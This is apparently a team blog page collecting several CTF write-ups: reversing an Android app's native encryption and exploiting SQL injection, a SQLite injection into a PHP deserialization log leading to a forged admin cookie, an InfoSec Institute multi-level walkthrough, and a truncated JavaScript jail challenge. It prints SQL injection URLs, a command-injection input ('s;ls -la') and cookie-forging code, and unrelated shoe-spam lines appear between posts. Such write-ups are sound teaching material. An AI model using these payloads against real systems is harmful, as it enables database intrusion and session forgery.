BalalaikaCr3w - web

Isomni'hack 2017 teaser mindreader writeup

russtone — Mon, 23 Jan 2017 13:46:15 +0000

Category:

Event:

Isomni'hack teaser 2017

Machines infected lots of Android smartphones and try to collect information on human behaviour... Have a look to their application and try to steal information on them.

So we have an android application file. Let's decompile its code!

First, we need to translate Dalvik bytecode to equivalent Java bytecode. I used enjarify for this:

➜ git clone https://github.com/google/enjarify
➜ cd enjarify
➜ ./enjarify.sh ../mindreader-c3df7f2c966238cc8f4d4327dc1dca8b8b5a69d702f966963c828c965ebbf516.apk -o ../app.jar

And now we can decompile java bytecode by using jd-gui. Let's see what we have.

The first intresting function is readMind:

static String device = "000000000000000";
...
public String readMind()
{
    localObject1 = device;
    String str1 = jsonify((String)localObject1); // encode to json {"device": "..."}
    byte[] arrayOfByte1 = str1.getBytes();
    byte[] arrayOfByte2 = new byte[arrayOfByte1.length];
    localObject1 = getApplicationContext();
    encrypt((Context)localObject1, arrayOfByte1, arrayOfByte2);
    int i = 0;
    localObject1 = null;
    String str2 = Base64.encodeToString(arrayOfByte2, 0);
    ... // Send HTTP-request with str2 as parameter to server
}

Here we can see that string with json {"device": "000000000000000"} is encrypted, encoded to base64 and then sent to the server. And function encrypt looks like this:

public native int encrypt(Context paramContext, byte[] paramArrayOfByte1, byte[] paramArrayOfByte2);

And above this we have lines:

static
{
    System.loadLibrary("native-lib");
}

As we can see encrypt function is implemented in library libnative-lib.so. Let's find it.

First, we should extract application files. I used apktool for this:

➜ apktool d mindreader-c3df7f2c966238cc8f4d4327dc1dca8b8b5a69d702f966963c828c965ebbf516.apk
➜ cd mindreader-c3df7f2c966238cc8f4d4327dc1dca8b8b5a69d702f966963c828c965ebbf516/lib/armeabi
➜ file libnative-lib.so
libnative-lib.so: ELF 32-bit LSB shared object, ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /system/bin/linker, BuildID[sha1]=f092f48095eec3cb0c6dd8eddec9994c2b3e01b4, stripped

Now we should find `encrypt` function in this library. As `encrypt` is called from java code it seems that it should use JNI (Java Native Interface). So, according to Oracle documentation name of encrypt function in library will be like Java_ch_scrt_hiddenservice_MainActivity_encrypt (ch.scrt.hiddenservice - name of application package, MainActivity - name of class).

In Ida Pro this function looks like this:

int __fastcall Java_ch_scrt_hiddenservice_MainActivity_encrypt(int a1, int a2, int a3, int a4, int a5)
{
  int v5; // ST1C_4@1
  int v6; // r4@1
  int v7; // r6@1
  unsigned int v8; // r0@1
  char v9; // r5@3
  int v10; // r1@3
  int v12; // [sp+8h] [bp-34h]@1
  int v13; // [sp+10h] [bp-2Ch]@1
  int v14; // [sp+14h] [bp-28h]@1
  int v15; // [sp+18h] [bp-24h]@2
  int v16; // [sp+1Ch] [bp-20h]@1
  int v17; // [sp+20h] [bp-1Ch]@1
  char v18; // [sp+24h] [bp-18h]@1
  __int16 v19; // [sp+28h] [bp-14h]@1
  char v20; // [sp+2Ah] [bp-12h]@1
  char v21; // [sp+2Bh] [bp-11h]@1
  int v22; // [sp+2Ch] [bp-10h]@4

  v14 = a4;
  v5 = a3;
  v6 = a1;
  v13 = a1;
  v7 = 0;
  v18 = 0;
  v12 = (*(int (**)(void))(*(_DWORD *)a1 + 684))();
  v17 = (*(int (__fastcall **)(int, int, char *))(*(_DWORD *)v6 + 736))(v6, v14, &v18);
  v16 = (*(int (__fastcall **)(int))(*(_DWORD *)v6 + 736))(v6);
  sub_4A68();
  v8 = sub_4AC4(v6, v5);
  v19 = v8;
  v20 = v8 >> 16;
  v21 = HIBYTE(v8);
  if ( v12 > 0 )
  {
    v15 = dword_1D0F8;
    do
    {
      v9 = *(_BYTE *)(v17 + v7);
      j_j_j___aeabi_idivmod(v7, 80);
      *(_BYTE *)(v16 + v7) = *((_BYTE *)&v19 + v7 % 4) ^ *(_BYTE *)(v15 + v10) ^ v9;
      ++v7;
    }
    while ( v12 != v7 );
  }
  (*(void (__fastcall **)(int, int, int, _DWORD))(*(_DWORD *)v13 + 768))(v13, v14, v17, 0);
  (*(void (__fastcall **)(int, int, int, _DWORD))(*(_DWORD *)v13 + 768))(v13, a5, v16, 0);
  if ( _stack_chk_guard != v22 )
    j_j___stack_chk_fail();
  return 0;
}

Also according to JNI Oracle documentation the first argument of this function is JNIEnv* env and the second is jobject obj. The rest of arguments is arguments from java i.e. Context paramContext, byte[] paramArrayOfByte1, byte[] paramArrayOfByte2). Now our function looks like this:

int __fastcall Java_ch_scrt_hiddenservice_MainActivity_encrypt(int env, int obj, int paramContext, int paramArrayOfByte1, int paramArrayOfByte2)
{
  ...
   paramArrayOfByte1_1 = paramArrayOfByte1;
  paramContext_1 = paramContext;
  env_1 = env;
  env_2 = env;
  v7 = 0;
  v18 = 0;
  v12 = (*(int (**)(void))(*(_DWORD *)env + 684))();
  v17 = (*(int (__fastcall **)(int, int, char *))(*(_DWORD *)env_1 + 736))(env_1, paramArrayOfByte1_1, &v18);
  v16 = (*(int (__fastcall **)(int))(*(_DWORD *)env_1 + 736))(env_1);
  sub_4A68();
  v8 = sub_4AC4(env_1, paramContext_1);
  v19 = v8;
  v20 = v8 >> 16;
  v21 = HIBYTE(v8);
  if ( v12 > 0 )
  {
    v15 = dword_1D0F8;
    do
    {
      v9 = *(_BYTE *)(v17 + v7);
      j_j_j___aeabi_idivmod(v7, 80);
      *(_BYTE *)(v16 + v7) = *((_BYTE *)&v19 + v7 % 4) ^ *(_BYTE *)(v15 + v10) ^ v9;
      ++v7;
    }
    while ( v12 != v7 );
  }
  (*(void (__fastcall **)(int, int, int, _DWORD))(*(_DWORD *)env_2 + 768))(env_2, paramArrayOfByte1_1, v17, 0);
  (*(void (__fastcall **)(int, int, int, _DWORD))(*(_DWORD *)env_2 + 768))(env_2, paramArrayOfByte2, v16, 0);
  if ( _stack_chk_guard != v22 )
    j_j___stack_chk_fail();
  return 0;
}

Better but still not readable because of many function calls like (*(int (__fastcall **)(int, int, char *))(*(_DWORD *)env_1 + 736)) i.e. by offset in JNIEnv *env. We need to find function names by their offsets in JNIEnv. All JNI functions are listed here. But I found cool Ida script IDA_JNI_Rename on GitHub. After using it our function will look like this:

int __fastcall Java_ch_scrt_hiddenservice_MainActivity_encrypt(int env, int obj, int paramContext, int paramArrayOfByte1, int paramArrayOfByte2)
{
  ...
  paramArrayOfByte1_1 = paramArrayOfByte1;
  paramContext_1 = paramContext;
  env_1 = env;
  env_2 = env;
  v7 = 0;
  v18 = 0;
  v12 = (*(int (**)(void))(*(_DWORD *)env + jni_GetArrayLength))();
  v17 = (*(int (__fastcall **)(int, int, char *))(*(_DWORD *)env_1 + jni_GetByteArrayElements))(
          env_1,
          paramArrayOfByte1_1,
          &v18);
  v16 = (*(int (__fastcall **)(int))(*(_DWORD *)env_1 + jni_GetByteArrayElements))(env_1);
  sub_4A68();
  v8 = sub_4AC4(env_1, paramContext_1);
  v19 = v8;
  v20 = v8 >> 16;
  v21 = HIBYTE(v8);
  if ( v12 > 0 )
  {
    v15 = dword_1D0F8;
    do
    {
      v9 = *(_BYTE *)(v17 + v7);
      j_j_j___aeabi_idivmod(v7, 80);
      *(_BYTE *)(v16 + v7) = *((_BYTE *)&v19 + v7 % 4) ^ *(_BYTE *)(v15 + v10) ^ v9;
      ++v7;
    }
    while ( v12 != v7 );
  }
  (*(void (__fastcall **)(int, int, int, _DWORD))(*(_DWORD *)env_2 + jni_ReleaseByteArrayElements))(
    env_2,
    paramArrayOfByte1_1,
    v17,
    0);
  (*(void (__fastcall **)(int, int, int, _DWORD))(*(_DWORD *)env_2 + jni_ReleaseByteArrayElements))(
    env_2,
    paramArrayOfByte2,
    v16,
    0);
  if ( _stack_chk_guard != v22 )
    j_j___stack_chk_fail();
  return 0;
}

Now we can assume that paramArrayOfByte1 is plaintext and paramArrayOfByte2 is ciphertext. Let's do some renames:

int __fastcall Java_ch_scrt_hiddenservice_MainActivity_encrypt(int env, int obj, int paramContext, int plaintext, int ciphertext)
{
  ...
  paramArrayOfByte1_1 = plaintext;
  paramContext_1 = paramContext;
  env_1 = env;
  env_2 = env;
  i = 0;
  v18 = 0;
  plaintext_len = (*(int (**)(void))(*(_DWORD *)env + jni_GetArrayLength))();
  plaintext_bytes = (*(int (__fastcall **)(int, int, char *))(*(_DWORD *)env_1 + jni_GetByteArrayElements))(
                      env_1,
                      paramArrayOfByte1_1,
                      &v18);
  ciphertext_bytes = (*(int (__fastcall **)(int))(*(_DWORD *)env_1 + jni_GetByteArrayElements))(env_1);
  sub_4A68();
  some_int = sub_4AC4(env_1, paramContext_1);
  some_int_1 = some_int;
  v20 = some_int >> 16;
  v21 = HIBYTE(some_int);
  if ( plaintext_len > 0 )
  {
    v15 = dword_1D0F8;
    do
    {
      v9 = *(_BYTE *)(plaintext_bytes + i);
      j_j_j___aeabi_idivmod(i, 80);
      *(_BYTE *)(ciphertext_bytes + i) = *((_BYTE *)&some_int_1 + i % 4) ^ *(_BYTE *)(v15 + v10) ^ v9;
      ++i;
    }
    while ( plaintext_len != i );
  }
  (*(void (__fastcall **)(int, int, int, _DWORD))(*(_DWORD *)env_2 + jni_ReleaseByteArrayElements))(
    env_2,
    paramArrayOfByte1_1,
    plaintext_bytes,
    0);
  (*(void (__fastcall **)(int, int, int, _DWORD))(*(_DWORD *)env_2 + jni_ReleaseByteArrayElements))(
    env_2,
    ciphertext,
    ciphertext_bytes,
    0);
  if ( _stack_chk_guard != v22 )
    j_j___stack_chk_fail(_stack_chk_guard - v22);
  return 0;
}

So, the encryption algoritm is like this:

int some_int = sub_4AC4(env_1, paramContext_1);
int dword_1D0F8[80] = ?;
for (i = 0; i < plaintext_len; i++) {
  ciphertext[i] = plaintext[i] ^ some_int[i % 4] ^ dword_1D0F8[i % 80];
}

Cool, but we don't have some_int and dword_1D0F8. At this point I decided that it would be easier to place a breakpoint here and just copy this values from memory because I'm lazy :) . To do this I used android emulator armeabi-v7a:

Start emulator with the command:

➜ emulator -avd Nexus_5_API_24

Then install application by drag'n'drop apk-file to it.

After that I setup Ida Dalvik debugger as described here and place breakpoint on encrypt in readMind function:

Then I opened another Ida instance with `libnative-lib.so`, setup remote android debugger as described here and place breakpoint before encryption started:

After that I ran Ida with Dalvik debugger and wait until program stopped and then I ran remote android debugger and attached to application process:

Next I press continue in first Ida instance (Dalvik debugger) and wait until breakpoint fires in second instance.

Ok, let's just find values of some_int and dword_1D0F8.

dword_1D0F8 (started from 7E 66 31 05):

and some_int = 0xb1342c3a:

Ok, now we can rewrite encrypion in python:

import json
import base64

table = [
    0x7e, 0x66, 0x31, 0x05, 0x11, 0x22, 0x2b, 0x1f,
    0x07, 0x74, 0x58, 0x19, 0x21, 0x16, 0x17, 0x05,
    0x56, 0x52, 0x09, 0x22, 0x7f, 0x61, 0x25, 0x1f,
    0x25, 0x13, 0x32, 0x33, 0x2a, 0x32, 0x32, 0x22,
    0x28, 0x51, 0x13, 0x27, 0x5b, 0x62, 0x26, 0x1e,
    0x20, 0x01, 0x0f, 0x09, 0x57, 0x1d, 0x14, 0x1e,
    0x39, 0x17, 0x1d, 0x19, 0x03, 0x50, 0x12, 0x12,
    0x02, 0x62, 0x1a, 0x7a, 0x0f, 0x4f, 0x26, 0x20,
    0x02, 0x32, 0x11, 0x11, 0x57, 0x3d, 0x2e, 0x33,
    0x0b, 0x14, 0x16, 0x0e, 0x1b, 0x60, 0x1c, 0x02,
]

crc = [ 0x3a, 0x2c, 0x34, 0xb1 ]

def encrypt(p):
    c = [0] * len(p)
    for i in range(len(p)):
        c[i] = chr(ord(p[i]) ^ crc[i % 4] ^ table[i % len(table)])
    return "".join(c)

def encode(data):
    return base64.b64encode(encrypt(json.dumps(data)))

To check it I've intercept HTTP-request from emulator and get:

GET /?a=1&c=P2hh0V1nfMsfYk6YKwoThFxODaN1fSGeLw8k%2Fw%3D%3D%0A HTTP/1.1
User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.0; sdk_google_phone_armv7 Build/NYC)
Host: mindreader.teaser.insomnihack.ch
Connection: close

So, we can check correctness of python script as:

test_in = '{"device":"000000000000000"}'
test_out = base64.b64decode("P2hh0V1nfMsfYk6YKwoThFxODaN1fSGeLw8k/w==")
assert(encrypt(test_in) == test_out)

Script was correct and I decided to try all requests from application:

URL = "http://mindreader.teaser.insomnihack.ch"

def read_mind(device_id):
    data = {
        "device": device_id
    }
    params = {
        "a": 1,
        "c": encode(data)
    }
    r = requests.get(URL, params=params)
    return r

def sms_send(device_id, date, sender, body):
    data = {
        "device": device_id,
        "date": 0,
        "sender": sender,
        "body": body
    }
    params = {
        "a": 2,
        "c": encode(data)
    }
    r = requests.get(URL, params=params)
    return r

sms_send request I found in file SMSReceiver.java in JD-GUI.

After playing a little bit with this two requests I found that parameter sender in sms_send is vulnerable to SQL injection (time-based). So after gettting all nessesary table names and column names I got a flag:

➜ python solve.py
INS{N00bSmS_M1nD_r3ad1nG_TecH}

Full script solve.py (LINK!)

Nike shoes | 2021 New adidas YEEZY BOOST 350 V2 "Ash Stone" GW0089 , Ietp

Attachments:

mindreader-c3df7f2c966238cc8f4d4327dc1dca8b8b5a69d702f966963c828c965ebbf516.apk

solve.py.txt

Web2 writeup

the_storm — Fri, 08 May 2015 17:41:19 +0000

Category:

web

Event:

Volga CTF 2015 Quals

This is the Web2 problem

The challenge simply states "Find the key!" and it gives us the challenge URL.
The first thing I usually do with a web challenge is to run dirbuster, spider the target and check the it with Nmap.

Checking with Nmap didn't result in anything interesting. However dirbuster did. I found two interesting folders.
The first one is "SecretAdminPanel" and the second one was "logs"

I visited "SecretAdminPanel" and I saw this.

So our goal is basically try to access this "SecretAdminPanel".
I then visited the "logs" folder, and I found that my IP got logged with the parameters I submitted to the page (so far no params).
I visited the SecretAdminPanel again and submitted some data through the GET request

web2.2015.volgactf.ru/SecretAdminPanel?test=test

I saw this message: "Don't attempt to hack, all requests will be logged."
Well this, in CTFs, This message simply means: HACK from here.

At the beginning I though that we will have SQLi in the INSERT statement in our request. I thought it will SQLi in the IP by injecting in the X-Forwarded-For or Client-IP request Headrs.
I tried SQLi there but didn't get any result.

Then probably in the params.
I tried the following request: http://web2.2015.volgactf.ru/SecretAdminPanel?test=test%27
and I got Error: unrecognized token: "";}')"
Interesting we have some errors available. looks like SQLi and my request was NOT logged. This means we probably had SQLi error and the request didn't finish processing due to the error.
I tried this one to double-check
http://web2.2015.volgactf.ru/SecretAdminPanel?test=test%27%27
and I got no errors and the request got logged perfectly.

Exploitation:
Now it is the time to exploit. I managed to know that th DBMS was sqlite. So this what I want to exploit: a SQLite database.
I am injecting in an insert statement and I am injecting in the last column.
I believe that the query in the backend was something like

query = INSERT INTO logs (IP, PARAMS) VALUES ($ip, $params);

I usually when I have a SQLi bug and errors are enabled. I try to inject in different places in the query to see the errors of the database. As a result of seeing the errors I can see part of the query in the backend.
So I injected in this part of the query string
http://web2.2015.volgactf.ru/SecretAdminPanel?test%27=test
and that was the result
Error: near "";s:4:"": syntax error
what we see here part of the INSERT query but we can see s:4: and this is part of a serialized string in PHP.
So probably the code in the backend something like this

$params = serialize($_GET)
query = "INSERT INTO logs (IP, PARAMS) VALUES ($'ip', '$params');"

now we want to have our injection with the serialization. I frist looked for the string concatenation operator in the SQLite to concatenate the result I want to see with the params. The string concatenation operator was "||"/
I tried this request first
http://web2.2015.volgactf.ru/SecretAdminPanel?test=test'||(Select "a")||'

The request worked successfully no SQL errors, this means our injection was correct.
However I checked the logs page and that was the result

array(2) {

["ip"]=>

string(12) "MY_IP"

["params"]=>

bool(false)

}

Why is this ?? It looks like that PHP couldn't deserialize the column correctly.
What they do in the backend something similar to this

SELECT IP, params from logs where IP = MyIP;
$params = unserialize(params)
var_dump($params)

so we have a problem in deserializing our data.
This is true because our injection was something like
?test=test'||(Select "a")||'

So the serialized string: 'a:1:{s:4:"test";s:22:"test'||(Select "a")||'";}'
and the string stored in the database: 'a:1:{s:4:"test";s:22:"testa";}'
This discrepancy between the INSERT statement and what stores in the database cause this error.

To solve this, I used something like repeat and substring functions in sqlite to have valid serialized string and stored correctly in the database.

That was my final query
http://web2.2015.volgactf.ru/SecretAdminPanel?test%27||%28SELECT%28substr%28group_concat%28name%29,0,5%29%29FROM%28sqlite_master%29%29||%28select%28replace%28substr%28quote%28zeroblob%28%28130%2b1%29/2%29%29,3,130%29,%220%22,%22a%22%29%29%29||%27

Executing this query will return us the names of tables in the database.
This query to extract the content of the params column in the database

http://web2.2015.volgactf.ru/SecretAdminPanel?test%27||%28SELECT%28hex%28substr%28group_concat%28params%29,100,61%29%29%29FROM%28logs%29%29||%28select%28replace%28substr%28quote%28zeroblob%28%289%2b1%29/2%29%29,3,9%29,%220%22,%22a%22%29%29%29||%27

I assumed we might get the params that the admin used to login into this page and then we will get the flag. However, it was not that easily.
Unfortunately the data inside the database was only mine, which means that each use has its own copy of the database.
The flag wont be in the database so we need to think of something else.

In the cookies we have this interesting cookie. PHPSESS=%7B%22isAdmin%22%3Afalse%7D0afb5cf5c7d66587da7c811767250458; expires=Fri, 08 May 2015 18:08:16 GMT; path=/; domain=.web2.2015.volgactf.ru; HttpOnly

Maybe to get the flag, we need to get the cookie salt used to form this cookie and form the valid cookie where isAdmin:true
another member in the team suggested to have the serialized Exception object, and when this object gets deseialized we will see our stacktrace and we might get something useful.

I used this query to add the exception object into the database.

http://web2.2015.volgactf.ru/SecretAdminPanel?test%27||%28select%28replace%28substr%28quote%28zeroblob%28%2894%2b1%29/2%29%29,3,94%29,%220%22,%22a%22%29%29%29||%27%22;O:9:%22Exception%22:0:{}}

and when we viewed the logs page we indeed saw the stacktrace and part of the output contains this

object(Session)#3 (2) {
["cookieSalt":"Session":private]=>
string(20) "nO97M0Za6cu9wDC72VVv"
["params":"Session":private]=>
array(1) {
["isAdmin"]=>
bool(false)

No we have the salt. To construct the valid cookie we simply need to do the following:

<?php
$str='{"isAdmin":true}';
$salt='nO97M0Za6cu9wDC72VVv';
echo urlencode($str).md5($str.$salt);
?>

and the flag was

{417a4c17bd3132bba864dac9edf4ae7a}

Notes:
1- I think it worth more than 200 pts comparing to the challenge remote web or even the joy and relax challenges.
2- There was a much easier way to exploit the SQLi. Simply we could have used stacked quiries ^^. It is sqlite so I could have simply added the serialized Exception object into the DB using something similar to this query. you just need to know how to use the query without spaces because it was replaced with underscores '_'

http://web2.2015.volgactf.ru/SecretAdminPanel?test');INSERT INTO logs(IP, PARAMS) VALUES ('127.0.0.1', 'O:9:"Exception":0:{}')--

Sportswear Design | Nike News

Infosec mini ctf writeup

the_storm — Mon, 23 Mar 2015 23:09:43 +0000

Category:

web

stego

forensics

Event:

Infosec Institute CTF

This is the InfoSec CTF writeup.
The ctf was very great. However, I felt it a bit simpler I think that was intended as a basic starting level. Some of the challneges were very interesting others were very straight forward. One thing that make me suffer a bit is the images in the challneges. I always had the feeling that they always contained something (steganography). I also was suffering with some guessing challenges like levle number 9. Yet, the good thing about the challneges is that each one will teach you something. The purpose of the CTF was to share knowledge. Below, you can find my write-up so please read, enjoy and take the best of it.
If you have any questions/comments, do NOT hesitate to contact me.

Thank you InfoSec Institute for the CTF

A pdf version of the solution can be found here.
https://www.dropbox.com/s/uuixb7zqcbyiq5x/solutions.zip?dl=0
If you would like to try the challenges before seeing the write-ups please check them on
http://ctf.infosecinstitute.com/

let's start :)

Level One

Challenge:

“May the source be with you! “

Solution:

Once I saw the word “source” then I expected that the flag will be in the HTML source code. I viewed the source code in my browser, and I managed to see the flag in the first line of the HTML code as illustrated below in the screenshot

flag: infosec_flagis_welcome

Level Two

Challenge:

“It seems like the image is broken..Can you check the file?“

Solution:

I checked the HTML source code and I got the image link which was “img/leveltwo.jpeg” Downloaded the image file and now it is time to analyse the file. The first step I wanted to to check the file type to see if it is actually an image. Executing the “file” command on linux that was the result.

looks like some ascii data inside not an image. Viewing the file content using the “cat” command that was the output “aW5mb3NlY19mbGFnaXNfd2VhcmVqdXN0c3RhcnRpbmc=“. The data is encoded in base64. I managed to know that because of the “=“ that was padded in the end of the text. using the base64 tool to decode that data that was the output “infosec_flagis_wearejuststarting”

Level Three

Challenge:

Nothing was stated regarding explicitly for the challenge. However there was that image that contains a QR code.

Solution:

sent the QR code to the following website http://zxing.org/w/decode?u=http%3A%2F%2Fctf.infosecinstitute.com%2Fimg%2Fqrcode. png
That was the result
.. -. ..-. --- ... . -.-. ..-. .-.. .- --. .. ... -- --- .-. ... .. -. —.
looks like some morse code. We need to find something to decode it. Using the following the website http://morsecode.scphillips.com/translator.html I managed to translate the morse code and that was the result.
“INFOSEC_FLAGIS_MORSING”

Level Four

Challenge:

“HTTP means Hypertext Transfer Protocol”

Solution:

HTTP is a Hyptertext Transfer Protocol. I thought that I might find the flag in any of the headers received from the server. I fired up my burp suite proxy to see what I will get in the HTTP response. These were the headers received from the server.

We can see that the server is setting a cookie in our browser. looks like it is encoding in some way however it has the same pattern as “infosec_flagis_xxxxxxx”
I didn’t know what was the encoding but it looks like some stream cipher. I expected it will be a caesar cipher. I coded this quick script to try all caesar with different steps. The script should stops once it finds the word “infosec”

def decode_ceaser(input_str, n):
    output = []
    for c in input_str:
        temp = 97+((ord(c)-97+n)%26)
        temp = chr(temp)
        output.append(temp)
    return output
for i in xrange(25):
        res = decode_ceaser(encoded_str, i)
        res = ''.join(res)
        if 'infosec' in res:
            print res
            break

and that was the result of running the script

infosec_flagis_welovecookies

Level Five:

Challenge:

No text was written only an image.

Solution:

I think this is steganography problem. It did take a lot of time for me to solve it since I am not that good with steganography. I checked the image with Stegsolve didn’t find anything. I checked it also with steghide but nothing. I checked some online websites and it was this website http://www.futureboy.us/stegano/decinput.html. I uploaded the image to the website and It resulted in some binary array as illustrated below

decoding the binary array I got using the following website http://string-functions.com/binary-string.aspx
and the result was
infosec_flagis_stegaliens

Level Six

Challenge:

“Do you want to download sharkfin.pcap file?”

Solution:

It is is a pcap file which we need to analyse. After downloading the pcap and opening with Wireshark. The first thing I do is to look at the protocol hierarchy and that was the result.

We can see a lot of HTTPS data which probably will not be interested in since we can’t decrypt it. I filtered out all tcp
data using the following filter “!(tcp)” and there was a single udp packet. I followed the UDP stream and that was the stream content. “696e666f7365635f666c616769735f736e6966666564”

Decoding the hex steam content that was the result

“infosec_flagis_sniffed”

Level Seven

Challenge:

Nothing appeared actually in the homepage.

Solution:

I opened the burp suite proxy to try to see the response coming from the server.

looks like we have some base64 data in the HTTP response reason field. Decoding the data we got this:
“infosec_flagis_youfoundit”

Level Eight

Challenge:

“Do you want to download app.exe file?”

Solution:

I downloaded the app.exe file. I thought first of reversing the app and see how it works. I was getting ready to run my windows VM and start the executable. However, I though of running the linux command “strings” quickly and see if I got any thing there. Indeed, I executed the command and that was the result.

The flag: infosec_flagis_0x1a

Level Nine

Challenge:

Solution:

I first expected that this will be a sql injection and I should bypass the login. I tried different SQL injection vectors to login but didn’t receive any output. I then said it might be something easier than that. I tried some dictionary attack on the login page and the following credentials logged in successfully.

username: root
password: attack
Once I logged in the output was
“ssaptluafed_sigalf_cesofni”
we can see that this is the flag but reversed. Reversing it again we have “infosec_flagis_defaultpass”

The flags looks a bit weird for me. I searched the web for the cisco IDS default login credentials but couldn’t find anything. Actually my script took a lot of time running to find the username and password.

Level Ten

Challenge:

What kind of sound is this? Sorcery perhaps??

Solution:

I downloaded the audio file. I expected that the wave audio file might contain something hidden in one of its channels. I examined how many channels the wave file contains. It was only one channel which means probably nothing is hidden in the wave channels. I executed binwalk to see if there is any thing appended or inside the audio file. However, I didn’t manage to get anything. I checked the image on the challenge page it was stating “not listening”. I though then I should find away to listen to what is being played. I changed the playback speed to some values and was listening to the output. Indeed, when I changed the playback speed to 0.22X I managed to listen to

“infosec_flagis_sound”

The URL of the edited file is: http://st0rm.altervista.org/solved.wav

Page 12 of 18

Level Eleven

Challenge:

No it must not be a sound? But wait whaT? [PHP logo]

Solution:

I downloaded the php logo. and it was named “php-logo-virus.jpg” the name is very catchy so I believe it contains our flag. One of the main things to analyse when dealing with images is the exif data. http://regex.info/exif.cgi is one of the best websites to analyse the exif data of images. Using the regex.info website, we managed to extract the following “infosec_flagis_aHR0cDovL3d3dy5yb2xsZXJza2kuY28udWsvaW1hZ2VzYi9wb3dlcnNsa WRlX2xvZ29fbGFyZ2UuZ2lm%a0%86%01” from the “Document Name” in the exif data structure. We see part of the flag and the other part is encoded in base64. Decoding the base64 resulted in: “http://www.rollerski.co.uk/imagesb/powerslide_logo_large.gif” I visited the url and the image contain the word “powerslide”. Hence, our flag should be

Flag: infosec_flagis_powersilde

Level Twelve

Question:

Dig deeper

Solution:

I saw the same image in the first level. I then decided it will be a steganography challenge. I kept digging into the image with all possible ways but I couldn’t find anything. I actually wasted a couple of days in that. Then I decided to move away from the image and check the source code of the page. I checked the source code again to see if it was related to level 1 by any means. I couldn’t find anything obvious. I then decided to compare the html of the two pages to see if there any differences. I used the comparer tool in burp suite to see the difference and that was the result.

Hmmm. We see there is a new css was added to leveltweleve.php file. I decided to check that css file. Now, I started to see the relation between the two levels (Dig deeper indeed). The content of the CSS file was
.thisloveis{

color: #696e666f7365635f666c616769735f686579696d6e6f7461636f6c6f72; }

Looks very interesting. There is no colour with the following value and this looks like a hex value. Decoding the hex value we got:

infosec_flagis_heyimnotacolor

Level Thirteen

Challenge:

What the heck happened here? It seems that the challenge here is gone? Can you find it? Can you check if you can find the backup file for this one? I'm sorry for messing up :(

Solution:

This challenge requires a bit of guessing to get the old file. Out of convention, developers usually name the old files as .old or .bak. or .backup. I tried to access http://ctf.infosecinstitute.com/levelthirteen.php.old and indeed I managed to access the old php file (backup). Opening the file in a text editor

We can see some interesting code commented out here. Our next step is to download the imadecoy file. I downloaded the file and directly executed the “file” command to know what file it is.

As we can see, it is a pcap file. I opened the file with Wireshak and directly checked the protocol hierarchy.

As we can see most of the packets are DNS. I am not sure if that was noise packets or it contains our flag. I checked some DNS packets randomly but nothing catchy was there. Most of the queries were DNS queries to google.com.ph. I decided to exclude all DNS queries because I think they are only noise. After excluding them I saw some HTTP requests. I sorted the packets with size and the 4th packet was JPG image named HoneyPY.PNG. Looks very interesting. Dumping the image, I saw that

Flag: infosec_flagis_morepackets

Level Fourteen

Challenge:

Do you want to download level14 file?

Solution:

The challenge file was dump of database. Browsing the database dump, there were a lot of tables and records. I searched for the word “flag”. I found a table but it didn’t contain anything interesting. However, after that table directly, there was a table named “friends” the fourth record of the table was some Unicode data, which looked very catchy.

(104, '\\u0069\\u006e\\u0066\\u006f\\u0073\\u0065\\u0063\\u005f\\u0066\\u006c\\u0061\\u0067\ \u0069\\u0073\\u005f\\u0077\\u0068\\u0061\\u0074\\u0073\\u006f\\u0072\\u0063\\u0065\\ u0072\\u0079\\u0069\\u0073\\u0074\\u0068\\u0069\\u0073', 'annoying', ‘0x0a');
I decoded the unicode data and it was

infosec_flagis_whatsorceryisthis

Level Fifteen

Challenge

“DNS Lookup”

Solution

I entered google.com to see the output and it was the output of the dig command. I expected that we have Remote Code Execution vulnerability here. I expected that the developer coded this in away similar to

system(“dig”.$_GET[‘dig’]);
I tried to give the following input “s;ls -la” and that was the result

Indeed, it executed our command. We can see the hidden file “.hey”. I “catted” the content of the .hey file and it was “Miux+mT6Kkcx+IhyMjTFnxT6KjAa+i6ZLibC”
The string looks encrypted/encoded in some way. I tried to decode the string with many things like Base16, Base32, Base64, Base91, Base58, Base85 and Caesar but it didn’t work. I noticed the ZlibC that appended to the end of the file. I though that this is a kind of a hint. I kept googling about the Zlibc and trying to find any relation between it and the given text. After a couple of days googling, I tried an encoding technique called ATOM-128 on that website http://crypo.in.ua/tools/eng_base64c.php and indeed it decoded the text which was

infosec_flagis_rceatomized

We searched for what atom-128 means and according to the following question on stackoverflow.com, it is a special type of base64 encoding in which a different order of characters is used.

Best Nike Sneakers | NIKE HOMME

JavaScript jail

villytiger — Mon, 02 Jun 2014 09:14:59 +0000

Category:

web

pwn

Event:

SecuInside CTF Quals 2014

We have an ip address and a port. Connected using netcat we got V8 JavaScript shell. print(Object.keys(this)) gives us all global objects available: print, quit, checker, check.

print(check) gives our pwn target:

function (rand) {
	function stage1() {
		var a = Array.apply(null, new Array(Math.floor(Math.random() * 20) + 10)).map(function () {return Math.random() * 0x10000;});
		var b = rand(a.length);

		if (!Array.isArray(b)) {
			print("You're a cheater!");
			return false;
		}

		if (b.length < a.length) {
			print("hmm.. too short..");
			for (var i = 0, n = a.length - b.length; i < n; i++) {
				delete b[b.length];
				b[b.length] = [Math.random() * 0x10000];
			}
		} else if (b.length > a.length) {
			print("hmm.. too long..");
			for (var i = 0, n = b.length - a.length; i < n; i++)
				Array.prototype.pop.apply(b);
		}

		for (var i = 0, n = b.length; i < n; i++) {
			if (a[i] != b[i]) {
				print("ddang~~");
				return false;
			}
		}

		return true;
	}

	function stage2() {
		var a = Array.apply(null, new Array((myRand() % 20) + 10)).map(function () {return myRand() % 0x10000;});
		var b = rand(a.length);

		if (!Array.isArray(b)) {
			print("You're a cheater!");
			return false;
		}

		if (b.length < a.length) {
			print("hmm.. too short..");
			for (var i = 0, n = a.length - b.length; i < n; i++) {
				delete b[b.length];
				b[b.length] = [Math.random() * 0x10000];
			}
		} else if (b.length > a.length) {
			print("hmm.. too long..");
			for (var i = 0, n = b.length - a.length; i < n; i++)
				Array.prototype.pop.apply(b);
		}

		for (var i = 0, n = b.length; i < n; i++) {
			if (a[i] != b[i]) {
				print("ddang~~");
				return false;
			}
		}

		return true;
	}

	print("stage1");

	if (!stage1())
		return;

	print("stage2");

	if (!stage2())
		return;

	print("awesome!");
	return flag;
}

